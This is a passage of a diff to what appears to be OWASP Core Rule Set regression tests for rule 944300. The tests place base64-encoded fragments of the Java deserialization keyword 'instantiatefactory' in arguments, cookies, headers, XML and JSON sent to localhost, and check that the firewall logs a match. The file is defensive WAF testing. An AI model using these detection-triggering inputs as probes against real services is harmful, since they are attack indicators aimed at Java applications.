"HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 137 desc: "Request header test includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: aW5zdGFudGlhdGVmYWN0b3J5 - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-138 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: aW5zdGFudGlhdGVmYWN0b3J5 + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 138 desc: "XML attribute value includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-139 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 139 desc: "XML element value includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "aW5zdGFudGlhdGVmYWN0b3J5" - output: - log_contains: "id \"944300\"" - - test_title: 944300-140 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "aW5zdGFudGlhdGVmYWN0b3J5" + output: + log: + expect_ids: [944300] + - test_id: 140 desc: "Nested XML element value includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "aW5zdGFudGlhdGVmYWN0b3J5" - output: - log_contains: "id \"944300\"" - - test_title: 944300-141 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "aW5zdGFudGlhdGVmYWN0b3J5" + output: + log: + expect_ids: [944300] + - test_id: 141 desc: "Content-Type text/plain includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=aW5zdGFudGlhdGVmYWN0b3J5" - output: - log_contains: "id \"944300\"" - - test_title: 944300-142 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=aW5zdGFudGlhdGVmYWN0b3J5" + output: + log: + expect_ids: [944300] + - test_id: 142 desc: "Content-Type application/json arg value includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"aW5zdGFudGlhdGVmYWN0b3J5\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-143 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"aW5zdGFudGlhdGVmYWN0b3J5\"}" + output: + log: + expect_ids: [944300] + - test_id: 143 desc: "Content-Type application/json arg name includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"aW5zdGFudGlhdGVmYWN0b3J5\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-144 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"aW5zdGFudGlhdGVmYWN0b3J5\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 144 desc: "Argument test includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Gluc3RhbnRpYXRlZmFjdG9yeQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-145 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Gluc3RhbnRpYXRlZmFjdG9yeQ" + output: + log: + expect_ids: [944300] + - test_id: 145 desc: "Argument name includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Gluc3RhbnRpYXRlZmFjdG9yeQ=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-146 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Gluc3RhbnRpYXRlZmFjdG9yeQ=test" + output: + log: + expect_ids: [944300] + - test_id: 146 desc: "Cookie test includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=Gluc3RhbnRpYXRlZmFjdG9yeQ - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-147 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Gluc3RhbnRpYXRlZmFjdG9yeQ + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 147 desc: "Cookie name includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: Gluc3RhbnRpYXRlZmFjdG9yeQ=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-148 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Gluc3RhbnRpYXRlZmFjdG9yeQ=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 148 desc: "Request header test includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: Gluc3RhbnRpYXRlZmFjdG9yeQ - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-149 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Gluc3RhbnRpYXRlZmFjdG9yeQ + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 149 desc: "XML attribute value includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-150 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 150 desc: "XML element value includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Gluc3RhbnRpYXRlZmFjdG9yeQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-151 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Gluc3RhbnRpYXRlZmFjdG9yeQ" + output: + log: + expect_ids: [944300] + - test_id: 151 desc: "Nested XML element value includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Gluc3RhbnRpYXRlZmFjdG9yeQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-152 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Gluc3RhbnRpYXRlZmFjdG9yeQ" + output: + log: + expect_ids: [944300] + - test_id: 152 desc: "Content-Type text/plain includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Gluc3RhbnRpYXRlZmFjdG9yeQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-153 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Gluc3RhbnRpYXRlZmFjdG9yeQ" + output: + log: + expect_ids: [944300] + - test_id: 153 desc: "Content-Type application/json arg value includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"Gluc3RhbnRpYXRlZmFjdG9yeQ\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-154 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"Gluc3RhbnRpYXRlZmFjdG9yeQ\"}" + output: + log: + expect_ids: [944300] + - test_id: 154 desc: "Content-Type application/json arg name includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"Gluc3RhbnRpYXRlZmFjdG9yeQ\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-155 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"Gluc3RhbnRpYXRlZmFjdG9yeQ\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 155 desc: "Argument test includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=BpbnN0YW50aWF0ZWZhY3Rvcnk" - output: - log_contains: "id \"944300\"" - - test_title: 944300-156 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=BpbnN0YW50aWF0ZWZhY3Rvcnk" + output: + log: + expect_ids: [944300] + - test_id: 156 desc: "Argument name includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "BpbnN0YW50aWF0ZWZhY3Rvcnk=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-157 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "BpbnN0YW50aWF0ZWZhY3Rvcnk=test" + output: + log: + expect_ids: [944300] + - test_id: 157 desc: "Cookie test includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=BpbnN0YW50aWF0ZWZhY3Rvcnk - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-158 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=BpbnN0YW50aWF0ZWZhY3Rvcnk + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 158 desc: "Cookie name includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: BpbnN0YW50aWF0ZWZhY3Rvcnk=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-159 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: BpbnN0YW50aWF0ZWZhY3Rvcnk=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 159 desc: "Request header test includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: BpbnN0YW50aWF0ZWZhY3Rvcnk - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-160 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: BpbnN0YW50aWF0ZWZhY3Rvcnk + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 160 desc: "XML attribute value includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-161 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 161 desc: "XML element value includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "BpbnN0YW50aWF0ZWZhY3Rvcnk" - output: - log_contains: "id \"944300\"" - - test_title: 944300-162 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "BpbnN0YW50aWF0ZWZhY3Rvcnk" + output: + log: + expect_ids: [944300] + - test_id: 162 desc: "Nested XML element value includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "BpbnN0YW50aWF0ZWZhY3Rvcnk" - output: - log_contains: "id \"944300\"" - - test_title: 944300-163 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "BpbnN0YW50aWF0ZWZhY3Rvcnk" + output: + log: + expect_ids: [944300] + - test_id: 163 desc: "Content-Type text/plain includes keyword 